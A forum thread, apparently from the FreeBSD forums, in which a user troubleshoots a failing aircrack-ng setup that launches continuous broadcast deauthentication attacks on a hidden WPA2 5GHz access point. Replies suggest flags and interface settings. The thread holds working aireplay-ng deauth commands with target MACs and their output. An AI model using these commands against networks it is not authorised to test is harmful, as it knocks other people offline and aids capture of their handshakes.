How to get Aircrack-ng to deauth 5GHz AP?

First_Law_of_Unix

First_Law_of_Unix

# aireplay-ng -0 0 -a AC:BD:80:CC:0F:AA -c 2D:38:50:10:09:54 wlan0

Code: 
20:32:05  Waiting for beacon frame (BSSID: AC:BD:80:CC:0F:AA) on channel 161
20:32:15  No such BSSID available.

Another way:
# aireplay-ng -0 0 -D -a AC:BD:80:CC:0F:AA wlan0

Code: 
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
01:02:44  Sending DeAuth (code 7) to broadcast -- BSSID: [AC:BD:80:CC:0F:AA]
wi_write(): Invalid argument

However for 2GHz Access points works perfectly fine.
I can airodump-ng and also aireplay-ng.

For 5Ghz only airodump-ng works but aireplay-ng does not work.

I'm using a Realtek RTL8812AU and also RTL8821AU, both works perfectly on Linux for 2Ghz and 5Ghz but 5Ghz does not work on FreeBSD 13.1

Any idea whats causing the issue?

Thanks.
 
Try including the essid -e network_name.

Further more:

Are wlan0/wlan1 in monitor mode?
Are airodump/airplay watching on the same channel?
Is wpa_supplicant running?

Missing?
20:32:05 Waiting for beacon frame (BSSID: AC:BD:80:CC:0F:AA??) on channel 161
Click to expand...

Is -D really available?
wi_write(): Invalid argument
Click to expand...

aireplay-ng [Aircrack-ng]

www.aircrack-ng.org www.aircrack-ng.org
  • “-D” :disables AP detection. Some modes will not proceed if the AP beacon is not heard. This disables this functionality.
Click to expand...

Try disabling the standard wlanX before using the interface wlanY in monitor mode if none of the above works.
Is it still necessary to indicate an -x value below 400 to avoid blocking these days?
 
Thanks for your reply.

It is actually wlan0 I created another wlan1 for a different NIC card.

CuatroTorres said:
Try including the essid -e network_name.
Click to expand...

Doesn't have a network name. Hidden AP.

CuatroTorres said:
Further more:

Are wlan0/wlan1 in monitor mode?
Click to expand...

Yes.

CuatroTorres said:
Are airodump/airplay watching on the same channel?
Click to expand...

Yes.

CuatroTorres said:
Is wpa_supplicant running?
Click to expand...

No. I have never set this up.

CuatroTorres said:
Is -D really available?

aireplay-ng [Aircrack-ng]

www.aircrack-ng.org www.aircrack-ng.org
Click to expand...

Yes, I strongly believe it is available for FreeBSD since I get the following:

Code: 
01:02:44  Sending DeAuth (code 7) to broadcast -- BSSID: [AC:BD:80:CC:0F:AA]

Then instantly I get this:
Code: 
wi_write(): Invalid argument

Also on Linux, to deauth 5GHz Access Points, it is required to use the -D option, without it deauth will not work.

Seems like it is working on FreeBSD, it sends one deauth packet but for some reason it shows:
Code: 
wi_write(): Invalid argument

Also the statement shown:
Code: 
01:02:44  Sending DeAuth (code 7) to broadcast -- BSSID: [AC:BD:80:CC:0F:AA]

Is exactly same as to Linux.

The -D option seems to be specific to help deauth 5GHz APs.

CuatroTorres said:
Try disabling the standard wlanX before using the interface wlanY in monitor mode if none of the above works.
Click to expand...

I have tried this, I restarted the PC each time I used different WiFi cards that are the best for Aircrack-ng. Works on Linux.

Here is what I did:

Restarted the PC.
Plugged in the WiFi adapter.

airmon-ng start rtwn0
airodump-ng wlan0 --band a
aireplay-ng -0 0 -D -a AC:BD:80:CC:0F:AA wlan0

Code: 
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
01:02:44  Sending DeAuth (code 7) to broadcast -- BSSID: [AC:BD:80:CC:0F:AA]
wi_write(): Invalid argument

CuatroTorres said:
Is it still necessary to indicate an -x value below 400 to avoid blocking these days?
Click to expand...

The syntax aireplay-ng -0 0 means:
-0 = This is the deauth option.
0 = After the deauth option is the value for it which is "0", it means to send continuously for the deauth packets indefinitely so long the program command is running.
 
airmon-ng start rtwn0
airodump-ng wlan0 --band a
ifconfig rtwn0 down?
aireplay-ng -0 0 -D -a AC:BD:80:CC:0F:AA wlan0

Indicate a channel for airodump airmon or include --ignore-negative-one.
 
Hello, Thanks for your reply.

root@user:/usr/home/user # airmon-ng start rtwn0

Code: 
usbconfig: -a: Invalid argument
usbconfig: -a: Invalid argument
Destroyed virtual interface wlan0
Created monitor mode interface wlan0 from rtwn0

Physical Interfaces:
==================
Interface       Driver          Chipset
usbconfig: -a: Invalid argument
usbconfig: -a: Invalid argument
rtwn0           Unknown         Report dmesg and usbconfig (dump commands) to http://tr
ac.aircrack-ng.org

Virtual Interfaces:
===================
Interface       Mode            Parent
usbconfig: -a: Invalid argument
usbconfig: -a: Invalid argument
wlan0           monitor         rtwn0

airodump-ng wlan0 --band a

Works as expected, using the syntax shown below:

root@user:/usr/home/user # airodump-ng wlan0 --bssid AC:BD:80:CC:0F:AA --band a -c 157

Code: 
 CH 157 ][ Elapsed: 12 s ][ 2023-04-02 15:10                                         

                                                                                                            
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
                                                                                                            
 AC:BD:80:CC:0F:AA   66 100      157        0    0 157  433  WPA2 CCMP   PSK  <length:  2>                  
                                                                                                            
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe

root@user:/usr/home/user # ifconfig rtwn0 down

Code: 
ifconfig: interface rtwn0 does not exist

root@user:/usr/home/user # ifconfig wlan0 down

Did not threw any errors.

root@user:/usr/home/user # aireplay-ng -0 0 -D -a AC:BD:80:CC:0F:AA wlan0

Code: 
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
14:57:23  Sending DeAuth (code 7) to broadcast -- BSSID: [AC:BD:80:CC:0F:AA]
wi_write(): Invalid argument

Using the channel option:
root@user:/usr/home/user # aireplay-ng -0 0 -D -c 157 -a AC:BD:80:CC:0F:AA wlan0

Code: 
Invalid destination MAC address.
"aireplay-ng --help" for help.

I do not believe aireplay-ng has channel option, however I have used it along with running airodump-ng's channel option and it does not make any difference.

root@user:/usr/home/user # aireplay-ng -0 0 --ignore-negative-one -D -a AC:BD:80:CC:0F:AA wlan0

Code: 
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
14:58:37  Sending DeAuth (code 7) to broadcast -- BSSID: [AC:BD:80:CC:0F:AA]
wi_write(): Invalid argument
 
Hello friend, did you fix this?? In any way?? I have the same issue and I do not find any more information, any help is really appreciated
 
Generally, in general, to my knowledge, FreeBSD is a bit "backward" when it comes to supporting WiFi cards, and I read somewhere that it is recommended to use an external router.

I once made a guide on one of my accounts, and it also says how to set the WiFi network to AccesPoint mode.
forums.freebsd.org

WiFi operation in AccesPoint mode along with maximum transmitter power in the bridge with ethenet cards.

For the implementation of the project was used a Qualcomm Atheros AR5418 WiFi card. It has the ability to operate at either 2.4GHz or 5GHz. But despite their attempts, they cannot act simultaneously. Since I can't use 5GHz, I use 2.4GHz, but the configuration is the same. ath0@pci0:7:0:0...
forums.freebsd.org forums.freebsd.org
 
You must log in or register to reply here.
Back
Top